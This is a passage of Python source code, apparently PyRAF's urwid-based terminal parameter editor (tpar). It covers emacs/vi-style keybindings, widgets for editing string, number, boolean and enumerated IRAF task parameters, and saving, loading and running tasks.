\"next_word\",\n \"ctrl W\": \"next_word\",\n \"ctrl b\": \"prev_word\",\n \"ctrl B\": \"prev_word\",\n \"ctrl a\": \"move_bol\",\n \"ctrl A\": \"move_bol\",\n \"ctrl e\": \"move_eol\",\n \"ctrl E\": \"move_eol\",\n \"ctrl T ctrl E\": \"end\",\n \"ctrl t ctrl e\": \"end\",\n \"ctrl T ctrl S\": \"home\",\n \"ctrl t ctrl s\": \"home\",\n \"ctrl L\": \"right\",\n \"ctrl l\": \"right\",\n \"ctrl H\": \"left\",\n \"ctrl h\": \"left\",\n \"ctrl U ctrl C\": \"undel_char\",\n \"ctrl u ctrl c\": \"undel_char\",\n \"ctrl U ctrl L\": \"undel_line\",\n \"ctrl u ctrl l\": \"undel_line\",\n \"ctrl U ctrl W\": \"undel_word\",\n \"ctrl u ctrl w\": \"undel_word\",\n \"esc ?\": \"help\"\n}\n\n\nclass Binder:\n \"\"\"The Binder class manages keypresses for urwid and adds the\n ability to bind specific inputs to actions.\n \"\"\"\n\n def __init__(self, bindings, inform, mode_keys=[]):\n self.bindings = bindings\n self.inform = inform\n self.mode_keys = mode_keys\n self.chord = []\n\n def bind(self, k, f):\n self.bindings[k] = f\n\n def keypress(self, pos, key):\n if key is None:\n return\n # Handle the \"ready\" binding specially to keep the rest simple.\n if key == \"ready\":\n if \"ready\" in self.bindings:\n return self.bindings[\"ready\"]()\n else:\n return \"ready\"\n self.debug(f\"pos: {pos} key: {key}\")\n if key in self.mode_keys:\n self.chord.append(key)\n return None\n elif not urwid.is_mouse_event(key):\n key = \" \".join(self.chord + [key])\n self.chord = []\n visited = []\n while key in self.bindings and key not in visited:\n visited.append(key)\n f = self.bindings[key]\n if f is None:\n key = None\n elif isinstance(f, str): # str & unicode?\n key = f\n else:\n key = f()\n self.debug(f\"pos: {pos} visited: {' --> '.join(visited)} \"\n f\"key: {key} mapping: {f}\")\n return key\n\n def debug(self, s):\n # return self.inform(s)\n return None\n\n\nclass PyrafEdit(urwid.Edit):\n \"\"\"PyrafEdit is a text entry widget which has keybindings similar\n to IRAF's CL epar command.\n \"\"\"\n\n def __init__(self, *args, **keys):\n inform = keys[\"inform\"]\n del keys[\"inform\"]\n self.reset_del_buffers()\n urwid.Edit.__init__(self, *args, **keys)\n EDIT_BINDINGS = { # single field bindings\n \"delete\": self.DEL_CHAR,\n \"del_line\": self.DEL_LINE,\n \"del_word\": self.DEL_WORD,\n\n \"undel_char\": self.UNDEL_CHAR,\n \"undel_word\": self.UNDEL_WORD,\n \"undel_line\": self.UNDEL_LINE,\n\n \"next_word\": self.NEXT_WORD,\n \"prev_word\": self.PREV_WORD,\n\n \"move_bol\": self.MOVE_BOL,\n \"move_eol\": self.MOVE_EOL,\n\n \"right\": 
self.MOVE_RIGHT,\n \"left\": self.MOVE_LEFT,\n }\n self._binder = Binder(EDIT_BINDINGS, inform)\n\n def reset_del_buffers(self):\n self._del_words = []\n self._del_lines = []\n self._del_chars = []\n\n def DEL_CHAR(self):\n s = self.get_edit_text()\n if len(s):\n n = self.edit_pos\n if n >= len(s):\n n -= 1\n c = s[n]\n self.set_edit_text(s[:n] + s[n + 1:])\n self._del_chars.append(c)\n\n def DEL_WORD(self):\n s = self.get_edit_text()\n i = self.edit_pos\n while i > 0 and not s[i].isspace():\n i -= 1\n if s[i].isspace():\n i += 1\n word = \"\"\n while i < len(s) and not s[i].isspace():\n word += s[i]\n i += 1\n s = s[:i - len(word)] + s[i:]\n self._del_words.append(word)\n self.edit_pos = i\n self.set_edit_text(s)\n\n def DEL_LINE(self):\n s = self.get_edit_text()\n line = s[self.edit_pos:]\n self.set_edit_text(s[:self.edit_pos])\n self.set_edit_pos(len(self.get_edit_text()))\n self._del_lines.append(line)\n\n def NEXT_WORD(self):\n s = self.get_edit_text()\n i = self.edit_pos\n while s and i < len(s) - 1 and not s[i].isspace():\n i += 1\n while s and i < len(s) - 1 and s[i].isspace():\n i += 1\n self.edit_pos = i\n\n def PREV_WORD(self):\n s = self.get_edit_text()\n i = self.edit_pos\n while s and i > 0 and s[i].isspace():\n i -= 1\n while s and i > 0 and not s[i].isspace():\n i -= 1\n self.edit_pos = i\n\n def MOVE_BOL(self):\n self.edit_pos = 0\n\n def MOVE_EOL(self):\n self.edit_pos = len(self.get_edit_text())\n\n def MOVE_RIGHT(self):\n if self.edit_pos < len(self.get_edit_text()):\n self.edit_pos += 1\n\n def MOVE_LEFT(self):\n if self.edit_pos > 0:\n self.edit_pos -= 1\n\n def UNDEL_CHAR(self):\n try:\n char = self._del_chars.pop()\n except:\n return\n self.insert_text(char)\n self.edit_pos -= 1\n\n def UNDEL_WORD(self):\n try:\n word = self._del_words.pop()\n except:\n return\n self.insert_text(word)\n\n def UNDEL_LINE(self):\n try:\n if len(self._del_lines) > 1:\n line = self._del_lines.pop()\n else:\n line = self._del_lines[0]\n except:\n return\n self.insert_text(line)\n\n def keypress(self, pos, key):\n key = Binder.keypress(self._binder, pos, key)\n if key is not None and not urwid.is_mouse_event(key):\n key = urwid.Edit.keypress(self, pos, key)\n return key\n\n def get_result(self):\n return self.get_edit_text().strip()\n\n def verify(self):\n return True\n\n\nclass StringTparOption(urwid.Columns):\n\n def __init__(self, paramInfo, defaultParamInfo, inform):\n\n MODE_KEYS = []\n\n BINDINGS = {\n \"enter\": self.ENTER,\n \"up\": self.MOVE_UP,\n \"down\": self.MOVE_DOWN,\n \"page up\": self.PAGE_UP,\n \"page down\": self.PAGE_DOWN,\n \"undel_line\": self.UNDEL_LINE,\n \"ready\": self.READY_LINE,\n \"end\": self.MOVE_END,\n \"home\": self.MOVE_START\n }\n\n self._binder = Binder(BINDINGS, inform, MODE_KEYS)\n\n self._mode = \"clear\"\n self._newline = True\n self.inform = inform\n self.paramInfo = paramInfo\n self.defaultParamInfo = defaultParamInfo\n\n name = self.paramInfo.name\n value = self.paramInfo.get(field=\"p_filename\", native=0, prompt=0)\n self._previousValue = value\n\n # Generate the input label\n if (self.paramInfo.get(field=\"p_mode\") == \"h\"):\n required = False\n else:\n required = True\n\n help = self.paramInfo.get(field=\"p_prompt\", native=0, prompt=0)\n self._args = (name, value, help, required)\n if not required:\n name = \"(\" + name\n help = \") \" + help\n else:\n help = \" \" + help\n self._name = urwid.Text(f\"{name:<10s}=\")\n self._edit = PyrafEdit(\"\",\n \"\",\n wrap=\"clip\",\n align=\"right\",\n inform=inform)\n self._edit.verify = 
self.verify\n self._value = urwid.Text(f\"{value:10s}\", align=\"right\")\n self._help = urwid.Text(f\"{help:<30s}\")\n urwid.Columns.__init__(self, [('weight', 0.20, self._name),\n ('weight', 0.20, self._edit),\n ('weight', 0.20, self._value),\n ('weight', 0.40, self._help)], 0, 1, 1)\n\n def keypress(self, pos, key):\n key = Binder.keypress(self._binder, pos, key)\n if key:\n key = self._edit.keypress(pos, key)\n return key\n\n def get_name(self):\n return self._args[0]\n\n def get_candidate(self):\n return self._edit.get_edit_text()\n\n def set_candidate(self, s):\n self._edit.set_edit_text(s)\n self._edit.edit_pos = len(s)\n\n def normalize(self, v):\n \"\"\"abstract method called to standardize equivalent values\n when the 'result' is set.\"\"\"\n return v\n\n def get_result(self):\n return self._value.get_text()[0].strip()\n\n def set_result(self, r):\n self._value.set_text(self.normalize(str(r)))\n\n def unlearn_value(self):\n self.set_result(self._previousValue)\n\n def verify(self, v):\n self.inform(\"\")\n return True\n\n def UNDEL_LINE(\n self\n ): # a little iffy. handle first copy from value field to edit field here. defer subsequent calls.\n v = self.get_result()\n if v:\n self.set_candidate(self.get_candidate() + v)\n self.set_result(\"\")\n else:\n return \"undel_line\"\n\n def ENTER(self):\n return self.linechange(\"down\")\n\n def MOVE_UP(self):\n return self.linechange(\"up\")\n\n def MOVE_DOWN(self):\n return self.linechange(\"down\")\n\n def PAGE_UP(self):\n return self.linechange(\"page up\")\n\n def PAGE_DOWN(self):\n return self.linechange(\"page down\")\n\n def MOVE_START(self):\n return self.linechange(\"home\")\n\n def MOVE_END(self):\n return self.linechange(\"end\")\n\n def linechange(self, rval):\n \"\"\"Updates this field when changing the field focus,\n i.e. 
switching lines.\"\"\"\n s = self.get_candidate()\n if s != \"\":\n if self.verify(s):\n self.set_result(s)\n self.set_candidate(\"\")\n else:\n return None\n else: # clear old error messages\n self.inform(\"\")\n self._edit.set_edit_pos(0)\n self._edit.reset_del_buffers()\n self._newline = True\n return rval\n\n def READY_LINE(self):\n \"\"\"Prepares this field for editing in the current\n mode: default clear or default edit.\"\"\"\n if not self._newline:\n return\n self._newline = False\n if self._mode == \"clear\":\n self.set_candidate(\"\")\n else:\n s = self.get_result()\n self.set_candidate(s)\n self._edit.set_edit_pos(len(s))\n\n def klass(self):\n return \"string\"\n\n\nclass NumberTparOption(StringTparOption):\n\n def normalize(self, v):\n if v in [\"INDEF\", \"Indef\", \"indef\"]:\n return \"INDEF\"\n else:\n return v\n\n def verify(self, v):\n try:\n if v != self._previousValue:\n self.paramInfo.set(v)\n self.paramInfo.set(self._previousValue)\n return True\n except ValueError as e:\n self.set_candidate(\"\")\n self.inform(str(e))\n return False\n\n def klass(self):\n return \"number\"\n\n\nclass BooleanTparOption(StringTparOption):\n\n def __init__(self, *args, **keys):\n StringTparOption.__init__(self, *args, **keys)\n self._binder.bind(\" \", \"space\")\n self._binder.bind(\"space\", self.TOGGLE)\n self._binder.bind(\"right\", self.TOGGLE)\n self._binder.bind(\"left\", self.TOGGLE)\n\n def TOGGLE(self):\n if self.get_result() == \"yes\":\n self.set_result(\"no\")\n else:\n self.set_result(\"yes\")\n\n def normalize(self, v):\n if v in [\"n\", \"N\"]:\n return \"no\"\n elif v in [\"y\", \"Y\"]:\n return \"yes\"\n else:\n return v\n\n def verify(self, v):\n v = self.normalize(v)\n if v in [\"yes\", \"no\"]:\n self.inform(\"\")\n return True\n else:\n self.set_candidate(\"\")\n self.inform(\"Not a valid boolean value.\")\n return False\n\n def klass(self):\n return \"boolean\"\n\n\nclass EnumTparOption(StringTparOption):\n\n def __init__(self, *args, **keys):\n StringTparOption.__init__(self, *args, **keys)\n self._binder.bind(\" \", \"space\")\n self._binder.bind(\"space\", self.SPACE)\n self._binder.bind(\"right\", self.SPACE)\n self._binder.bind(\"left\", self.LEFT)\n\n def adjust(self, delta, wrap):\n choices = self.paramInfo.choice\n try:\n v = choices[choices.index(self.get_result()) + delta]\n except IndexError:\n v = choices[wrap]\n self.set_result(v)\n\n def SPACE(self):\n return self.adjust(1, 0)\n\n def LEFT(self):\n return self.adjust(-1, -1)\n\n def klass(self):\n return \"enumeration\"\n\n def verify(self, v):\n if v not in self.paramInfo.choice:\n self.inform(\"What? 
choose: \" + \"|\".join(self.paramInfo.choice))\n self.set_candidate(\"\")\n return False\n return True\n\n\nclass PsetTparOption(StringTparOption):\n\n def klass(self):\n return \"pset\"\n\n\nclass TparHeader(urwid.Pile):\n banner = \"\"\" I R A F\n Image Reduction and Analysis Facility\n\"\"\"\n\n def __init__(self, package, task=None):\n top = urwid.Text((\"header\", self.banner))\n s = f\"{'PACKAGE':>8}= {package:<10}\\n\"\n if task is not None:\n s += f\"{'TASK':>8}= {task:<10}\"\n info = urwid.Text((\"body\", s))\n urwid.Pile.__init__(self, [top, info])\n\n\nclass TparDisplay(Binder):\n palette = [\n ('body', 'default', 'default', 'standout'),\n ('header', 'default', 'default', ('standout', 'underline')),\n ('help', 'black', 'light gray'),\n ('reverse', 'light gray', 'black'),\n ('important', 'dark blue', 'light gray', ('standout', 'underline')),\n ('editfc', 'white', 'dark blue', 'bold'),\n ('editbx', 'light gray', 'dark blue'),\n ('editcp', 'black', 'light gray', 'standout'),\n ('bright', 'dark gray', 'light gray', ('bold', 'standout')),\n ('buttn', 'black', 'dark cyan'),\n ('buttnf', 'white', 'dark blue', 'bold'),\n ]\n\n def __init__(self, taskName):\n\n MODE_KEYS_EMACS = [\"esc\"]\n\n MODE_KEYS_VI = [\"esc\", \"tab\", \"ctrl u\", \"ctrl U\", \"ctrl t\", \"ctrl T\"]\n\n TPAR_BINDINGS = { # Page level bindings\n \"quit\": self.QUIT,\n \"exit \": self.EXIT,\n \"help\": self.HELP,\n \"end\": self.MOVE_END,\n \"home\": self.MOVE_START,\n }\n\n # Get the Iraftask object\n if isinstance(taskName, irafpar.IrafParList):\n # IrafParList acts as an IrafTask for our purposes\n self.taskObject = taskName\n else:\n # taskName must be a string or an IrafTask object\n self.taskObject = iraf.getTask(taskName)\n\n # Now go back and ensure we have the full taskname\n self.taskName = self.taskObject.getName()\n self.pkgName = self.taskObject.getPkgname()\n self.paramList = self.taskObject.getParList(docopy=1)\n\n # See if there exist any special versions on disk to load\n self.__areAnyToLoad = irafpar.haveSpecialVersions(\n self.taskName, self.pkgName) # irafpar caches them\n\n # Ignore the last parameter which is $nargs\n self.numParams = len(self.paramList) - 1\n\n # Get default parameter values for unlearn\n self.get_default_param_list()\n self.make_entries()\n\n self.escape = False\n\n self._createButtons()\n\n self.colon_edit = PyrafEdit(\"\",\n \"\",\n wrap=\"clip\",\n align=\"left\",\n inform=self.inform)\n self.listitems = [urwid.Divider(\" \")] + self.entryNo + \\\n [urwid.Divider(\" \"), self.colon_edit,\n self.buttons]\n self.listbox = urwid.ListBox(self.listitems)\n\n self.listbox.set_focus(1)\n self.footer = urwid.Text(\"\")\n self.header = TparHeader(self.pkgName, self.taskName)\n\n self.view = urwid.Frame(self.listbox,\n header=self.header,\n footer=self.footer)\n\n self._editor = iraf.envget(\"editor\")\n BINDINGS = {}\n BINDINGS.update(TPAR_BINDINGS)\n if self._editor == \"vi\":\n BINDINGS.update(TPAR_BINDINGS_VI)\n MODE_KEYS = MODE_KEYS_VI\n else:\n BINDINGS.update(TPAR_BINDINGS_EMACS)\n MODE_KEYS = MODE_KEYS_EMACS\n Binder.__init__(self, BINDINGS, self.inform, MODE_KEYS)\n\n def _createButtons(self):\n \"\"\" Set up all the bottom row buttons and their spacings \"\"\"\n\n isPset = isinstance(self.taskObject, iraftask.IrafPset)\n\n self.help_button = urwid.Padding(urwid.Button(\"Help\", self.HELP),\n align=\"center\",\n width=8,\n right=4,\n left=5)\n self.cancel_button = urwid.Padding(urwid.Button(\"Cancel\", self.QUIT),\n align=\"center\",\n width=10)\n if not isPset:\n 
self.save_as_button = urwid.Padding(urwid.Button(\n \"Save As\", self.SAVEAS),\n align=\"center\",\n width=11)\n self.save_button = urwid.Padding(urwid.Button(\"Save\", self.EXIT),\n align=\"center\",\n width=8)\n self.exec_button = urwid.Padding(urwid.Button(\"Exec\", self.go),\n align=\"center\",\n width=8)\n if self.__areAnyToLoad:\n self.open_button = urwid.Padding(urwid.Button(\"Open\", self.PFOPEN),\n align=\"center\",\n width=8)\n\n # GUI button layout - weightings\n if isPset: # show no Open nor Save As buttons\n self.buttons = urwid.Columns([('weight', 0.20, self.exec_button),\n ('weight', 0.23, self.save_button),\n ('weight', 0.23, self.cancel_button),\n ('weight', 0.20, self.help_button)])\n else:\n if not self.__areAnyToLoad: # show Save As but not Open\n self.buttons = urwid.Columns([\n ('weight', 0.15, self.exec_button),\n ('weight', 0.15, self.save_button),\n ('weight', 0.18, self.save_as_button),\n ('weight', 0.18, self.cancel_button),\n ('weight', 0.15, self.help_button)\n ])\n else: # show all possible buttons (iterated on this spacing)\n self.buttons = urwid.Columns([\n ('weight', 0.10, self.open_button),\n ('weight', 0.10, self.exec_button),\n ('weight', 0.10, self.save_button),\n ('weight', 0.12, self.save_as_button),\n ('weight', 0.12, self.cancel_button),\n ('weight', 0.10, self.help_button)\n ])\n\n def get_default_param_list(self):\n # Obtain the default parameter list\n dlist = self.taskObject.getDefaultParList()\n if len(dlist) != len(self.paramList):\n # whoops, lengths don't match\n raise ValueError(\"Mismatch between default, current par lists\"\n f\" for task {self.taskName} (try unlearn)\")\n pardict = {}\n for par in dlist:\n pardict[par.name] = par\n\n # Build default list sorted into same order as current list\n try:\n dsort = []\n for par in self.paramList:\n dsort.append(pardict[par.name])\n except KeyError:\n raise ValueError(\"Mismatch between default, current par lists\"\n f\" for task {self.taskName} (try unlearn)\")\n self.defaultParamList = dsort\n\n # Method to create the parameter entries\n def make_entries(self):\n # Loop over the parameters to create the entries\n self.entryNo = [None] * self.numParams\n for i in range(self.numParams):\n self.entryNo[i] = self.tpar_option_factory(\n self.paramList[i], self.defaultParamList[i])\n\n def main(self):\n # Create the Screen using curses_display.\n self.ui = urwid.curses_display.Screen()\n self.ui.register_palette(self.palette)\n self.ui.run_wrapper(self.run) # raw_display has alternate_buffer=True\n self.done()\n\n def get_keys(self):\n keys = []\n while not keys:\n try:\n keys = self.ui.get_input()\n except KeyboardInterrupt:\n keys = [\"ctrl c\"]\n return keys\n\n def run(self):\n self.ui.set_mouse_tracking()\n size = self.ui.get_cols_rows()\n self.done = False\n self._newline = True\n while not self.done:\n self.view.keypress(size, \"ready\")\n canvas = self.view.render(size, focus=1)\n self.ui.draw_screen(size, canvas)\n for k in self.get_keys():\n if k == \":\":\n self.colon_escape()\n break\n elif urwid.is_mouse_event(k):\n event, button, col, row = k\n self.view.mouse_event(size,\n event,\n button,\n col,\n row,\n focus=True)\n elif k == 'window resize':\n size = self.ui.get_cols_rows()\n self.inform(f\"resize {str(size)}\")\n k = self.keypress(size, k)\n self.view.keypress(size, k)\n\n def colon_escape(self):\n \"\"\"colon_escape switches the focus to the 'mini-buffer' and\n accepts and executes a one line colon command.\"\"\"\n w, pos0 = self.listbox.get_focus()\n try:\n default_file = 
w.get_result()\n        except AttributeError:  # focused widget is not a parameter entry\n            default_file = \"\"\n        self.listbox.set_focus(len(self.listitems) - 2)\n        size = self.ui.get_cols_rows()\n        self.colon_edit.set_edit_text(\"\")\n        self.colon_edit.set_edit_pos(0)\n        self.view.keypress(size, \":\")\n        done = False\n        while not done:\n            canvas = self.view.render(size, focus=1)\n            self.ui.draw_screen(size, canvas)\n            for k in self.get_keys():\n                if urwid.is_mouse_event(k) or \\\n                        k == \"ctrl c\" or k == \"ctrl g\":\n                    self.colon_edit.set_edit_text(\"\")\n                    return\n                elif k == 'window resize':\n                    size = self.ui.get_cols_rows()\n                elif k == 'enter':\n                    done = True\n                    break\n                k = self.keypress(size, k)\n                self.view.keypress(size, k)\n        cmd = self.colon_edit.get_edit_text()\n        self.listbox.set_focus(pos0)\n        self.colon_edit.set_edit_text(\"\")\n        self.process_colon(cmd)\n\n    def process_colon(self, cmd):\n        # :<letter> [!] [<file>]\n        groups = re.match(\n            \"^:(?P<cmd>[a-z])\\\\s*\"\n            \"(?P<emph>!?)\\\\s*\"\n            \"(?P<file>\\\\w*)\", cmd)\n        if not groups:\n            self.inform(\"bad command: \" + cmd)\n        else:\n            letter = groups.group(\"cmd\")\n            emph = groups.group(\"emph\") == \"!\"\n            file = groups.group(\"file\")\n            try:\n                f = {\n                    \"q\": self.QUIT,\n                    \"g\": self.go,\n                    \"r\": self.read_pset,\n                    \"w\": self.write_pset,\n                    \"e\": self.edit_pset\n                }[letter]\n            except KeyError:\n                self.inform(\"unknown command: \" + cmd)\n                return\n            try:\n                f(file, emph)\n            except Exception as e:\n                self.inform(f\"command '{cmd}' failed with exception '{e}'\")\n\n    def save_as(self):\n        \"\"\" Save the parameter settings to a user-specified file. Any\n        changes here must be coordinated with the corresponding epar saveAs\n        function. \"\"\"\n\n        # The user wishes to save to a different name.\n        fname = self.select_file(\"Save parameter values to which file?\",\n                                 overwriteCheck=True)\n\n        # Now save the parameters\n        if fname is None:\n            msg = \"Parameters NOT saved to a file.\"\n            okdlg = urwutil.DialogDisplay(msg, 8, 0)\n            okdlg.add_buttons([(\"OK\", 0)])\n            okdlg.main()\n            return\n\n        # Tpar apparently does nothing with children (PSETs), so skip the\n        # check or set or save of them\n\n        # Notify them that pset children will not be saved as part of\n        # their special version\n        pars = []\n        for par in self.paramList:\n            if par.type == \"pset\":\n                pars.append(par.name)\n        if len(pars):\n            msg = \"If you have made any changes to the PSET \"+ \\\n                \"values for:\\n\\n\"\n            for p in pars:\n                msg += \" \" + p + \"\\n\"\n            msg = msg+\"\\nthose changes will NOT be explicitly saved to:\"+ \\\n                '\\n\\n\"'+fname+'\"'\n            # title='PSET Save-As Not Yet Supported\n            okdlg = urwutil.DialogDisplay(msg, 0, 0)\n            okdlg.add_buttons([(\"OK\", 0)])\n            okdlg.main()\n\n        # Verify all the entries (without save), keeping track of the invalid\n        # entries which have been reset to their original input values\n        self.badEntriesList = self.check_set_save_entries(False)\n\n        # If there were invalid entries, prepare the message dialog\n        ansOKCANCEL = True\n        if self.badEntriesList:\n            ansOKCANCEL = self.process_bad_entries(self.badEntriesList,\n                                                   self.taskName)\n        if not ansOKCANCEL:\n            return  # should we tell them we are not saving ?\n\n        # If there were no invalid entries or the user said OK, finally\n        # save to their stated file. 
Since we have already processed the\n # bad entries, there should be none returned.\n mstr = \"TASKMETA: task=\" + self.taskName + \" package=\" + self.pkgName\n if self.check_set_save_entries(doSave=True,\n filename=fname,\n comment=mstr):\n raise Exception(\"Unexpected bad entries for: \" + self.taskName)\n\n # Let them know what they just did\n msg = 'Saved to: \"' + fname + '\"'\n okdlg = urwutil.DialogDisplay(msg, 8, 0)\n okdlg.add_buttons([(\"OK\", 0)])\n okdlg.main()\n\n # Notify irafpar that there is a new special-purpose file on the scene\n irafpar.newSpecialParFile(self.taskName, self.pkgName, fname)\n\n def pfopen(self):\n \"\"\" Load the parameter settings from a user-specified file. Any\n changes here must be coordinated with the corresponding epar pfopen\n function. \"\"\"\n\n flist = irafpar.getSpecialVersionFiles(self.taskName, self.pkgName)\n if len(flist) <= 0:\n msg = \"No special-purpose parameter files found for \" + self.taskName\n okdlg = urwutil.DialogDisplay(msg, 8, 0)\n okdlg.add_buttons([(\"OK\", 0)])\n okdlg.main()\n return\n\n fname = None\n if len(flist) == 1:\n msg = \"One special-purpose parameter file found.\\n\"+ \\\n \"Load file?\\n\\n\"+flist[0]\n yesnodlg = urwutil.DialogDisplay(msg, 12, 0)\n yesnodlg.add_buttons([(\"OK\", 0), (\"Cancel\", 1)])\n rv, junk = yesnodlg.main()\n if rv == 0:\n fname = flist[0] # if not, fname is still None\n else: # >1 file, need a select dialog\n flist.sort()\n chcs = [] # ListDialogDisplay takes a 2-column tuple\n for i in range(len(flist)):\n chcs.append(str(i)) # need index as tag - it is the return val\n chcs.append(flist[i])\n\n def menuItemConstr(tag, state):\n return urwutil.MenuItem(tag)\n\n selectdlg = urwutil.ListDialogDisplay(\"Select from these:\",\n len(flist) + 7,\n 75, menuItemConstr,\n tuple(chcs), False)\n selectdlg.add_buttons([\n (\"Cancel\", 1),\n ])\n rv, ans = selectdlg.main()\n if rv == 0:\n fname = flist[int(ans)]\n\n # check-point: if fname is not None, we load a file\n msg = \"\\n\\nPress any key to continue...\"\n\n if fname is not None:\n newParList = irafpar.IrafParList(self.taskName, fname) # load it\n self.set_all_entries_from_par_list(newParList) # set GUI entries\n msg = \"\\n\\nLoaded:\\n\\n \" + fname + msg\n\n # Notify them (also forces a screen redraw, which we need)\n try:\n self.ui.clear() # fixes clear when next line calls draw_screen\n except AttributeError:\n self.ui._clear() # older urwid vers use different method name\n self.info(msg, None)\n\n def save(self, emph):\n # Save all the entries and verify them, keeping track of the invalid\n # entries which have been reset to their original input values\n if emph:\n return\n self.badEntriesList = self.check_set_save_entries(True)\n\n # If there were invalid entries, prepare the message dialog\n ansOKCANCEL = True\n if (self.badEntriesList):\n ansOKCANCEL = self.process_bad_entries(self.badEntriesList,\n self.taskName)\n return ansOKCANCEL\n\n def MOVE_START(self):\n self.listbox.set_focus(1)\n return \"home\"\n\n def MOVE_END(self):\n self.listbox.set_focus(len(self.entryNo))\n return \"end\"\n\n # For the following routines, event is either a urwid event *or*\n # a Pset filename\n def QUIT(self, event=None, emph=True): # maybe save\n self.save(emph)\n\n def quit_continue():\n pass\n\n self.done = quit_continue\n\n def PFOPEN(self, event=None):\n \"\"\" Open button - load parameters from a user specified file\"\"\"\n self.pfopen()\n self.done = None # simply continue\n\n def SAVEAS(self, event=None):\n \"\"\" SaveAs button - save 
parameters to a user specified file\"\"\"\n        self.save_as()\n\n        def save_as_continue():  # get back to editing\n            iraffunctions.tparam(self.taskObject)\n\n        self.done = save_as_continue  # self.done = None # will also continue\n\n    def EXIT(self, event=None):  # always save\n        self.QUIT(event, False)\n\n    # EXECUTE: save the parameter settings and run the task\n    def go(self, event=None, emph=False):\n        \"\"\"Executes the task.\"\"\"\n        self.save(emph)\n\n        def go_continue():\n            print(f\"\\nTask {self.taskName} is running...\\n\")\n            self.run_task()\n\n        self.done = go_continue\n\n    def edit_pset(self, file, emph):\n        \"\"\"Edits the pset referred to by the specified file or the current field.\"\"\"\n        self.save(emph)\n        w, pos0 = self.listbox.get_focus()\n        try:\n            default_file = w.get_result()\n        except AttributeError:  # focused widget is not a parameter entry\n            default_file = \"\"\n        if file == \"\":\n            iraffunctions.tparam(default_file)\n        else:\n\n            def edit_pset_continue():\n                iraffunctions.tparam(file)\n\n            self.done = edit_pset_continue\n\n    def read_pset(self, file, emph):\n        \"\"\"Unlearns the current changes *or* reads in the specified file.\"\"\"\n        if file == \"\":\n            self.unlearn_all_entries()\n        else:\n\n            def new_pset():\n                self.__init__(file)\n\n            self.done = new_pset\n\n    def write_pset(self, file, overwrite):\n        if os.path.exists(file) and not overwrite:\n            self.inform(f\"File '{file}' exists and overwrite (!) not used.\")\n            return\n        # XXXX write out parameters to file\n        self.inform(f\"write pset: {file}\")\n\n    def set_all_entries_from_par_list(self, aParList):\n        \"\"\" Set all the parameter entry values in the GUI to the values\n        in the given par list. Note corresponding EditParDialog method. \"\"\"\n        for i in range(self.numParams):\n            par = self.paramList[i]\n            if par.type == \"pset\":\n                continue  # skip PSET's for now\n            gui_entry = self.entryNo[i]\n            par.set(aParList.getValue(par.name, native=1, prompt=0))\n            # gui holds a str, but par.value is native; conversion occurs\n            gui_entry.set_result(par.value)\n\n    def unlearn_all_entries(self):\n        \"\"\" Method to \"unlearn\" all the parameter entry values in the GUI\n        and set the parameter back to the default value \"\"\"\n        for entry in self.entryNo:\n            entry.unlearn_value()\n\n    # Read, save, and verify the entries\n    def check_set_save_entries(self, doSave, filename=None, comment=None):\n\n        self.badEntries = []\n\n        # Loop over the parameters to obtain the modified information\n        for i in range(self.numParams):\n\n            par = self.paramList[i]\n            entry = self.entryNo[i]\n            # Cannot change an entry if it is a PSET, just skip\n            if par.type == \"pset\":\n                continue\n\n            value = entry.get_result()\n\n            # Set new values for changed parameters - a bit tricky,\n            # since changes that weren't followed by a return or\n            # tab have not yet been checked. If we eventually\n            # use a widget that can check all changes, we will\n            # only need to check the isChanged flag.\n            if par.isChanged() or value != entry._previousValue:\n
                # Verify the value is valid. If it is invalid,\n                # the value will be converted to its original valid value.\n                # Maintain a list of the reset values for user notification.\n                if not entry.verify(value):\n                    self.badEntries.append(\n                        [entry.paramInfo.name, value, entry._previousValue])\n                else:\n                    self.taskObject.setParam(par.name, value)\n\n        # Save results to the uparm directory\n        # Skip the save if the thing being edited is an IrafParList without\n        # an associated file (in which case the changes are just being\n        # made in memory.)\n\n        if doSave and ((not isinstance(self.taskObject, irafpar.IrafParList))\n                       or self.taskObject.getFilename()):\n            self.taskObject.saveParList(filename=filename, comment=comment)\n\n        return self.badEntries\n\n    # Run the task\n    def run_task(self):\n\n        # Use the run method of the IrafTask class\n        # Set mode='h' so it does not prompt for parameters (like IRAF epar)\n        # Also turn on parameter saving\n        self.taskObject.run(mode='h', _save=1)\n\n    def get_results(self):\n        results = {}\n        for i in self.entryNo:\n            results[i.get_name()] = i.get_result()\n        return results\n\n    def draw_screen(self, size):\n        canvas = self.view.render(size, focus=True)\n        self.ui.draw_screen(size, canvas)\n\n    def inform(self, s):\n        \"\"\"output any message to status bar\"\"\"\n        self.footer.set_text(s)\n\n    def info(self, msg, b):\n        self.exit_flag = False\n        size = self.ui.get_cols_rows()\n        exit_button = urwid.Padding(urwid.Button(\"Exit\", self.exit_info),\n                                    align=\"center\",\n                                    width=8)\n        frame = urwid.Frame(urwid.Filler(urwid.AttrWrap(\n            urwid.Text(msg), \"help\"),\n            valign=\"top\"),\n            header=self.header,\n            footer=exit_button)\n        canvas = frame.render(size)\n        self.ui.draw_screen(size, canvas)\n        self.get_keys()  # wait for keypress\n\n    def exit_info(self, ehb):\n        self.exit_flag = True\n\n    def HELP(self, event=None):\n        if self._editor == \"vi\":\n            self.info(TPAR_HELP_VI, self.help_button)\n        else:\n            self.info(TPAR_HELP_EMACS, self.help_button)\n\n    def select_file(self, prompt, overwriteCheck=False):\n        \"\"\" Allow user to input a file - handle whether it is expected\n        to be new or existing. Returns file name on success, None on error. \"\"\"\n\n        # Allow the user to select a specific file. Note that urwid's\n        # browser example (browse.py) doesn't work with 0.9.7.\n        while True:\n            try:\n                fname = urwfiledlg.main()\n            except Exception:  # fall back to manual entry on chooser errors\n                prompt = \"(File chooser error, enter choice manually.)\\n\" + prompt\n                inputdlg = urwutil.InputDialogDisplay(prompt, 9, 0)\n                inputdlg.add_buttons([(\"OK\", 0), (\"Cancel\", 1)])\n                rv, fname = inputdlg.main()\n                if rv > 0:\n                    fname = None\n\n            if fname is None:\n                return None  # they canceled\n            fname = fname.strip()\n            if len(fname) == 0:\n                return None\n\n            # See if the file exists (if we care)\n            if overwriteCheck and os.path.exists(fname):\n                yesnodlg = urwutil.DialogDisplay(\n
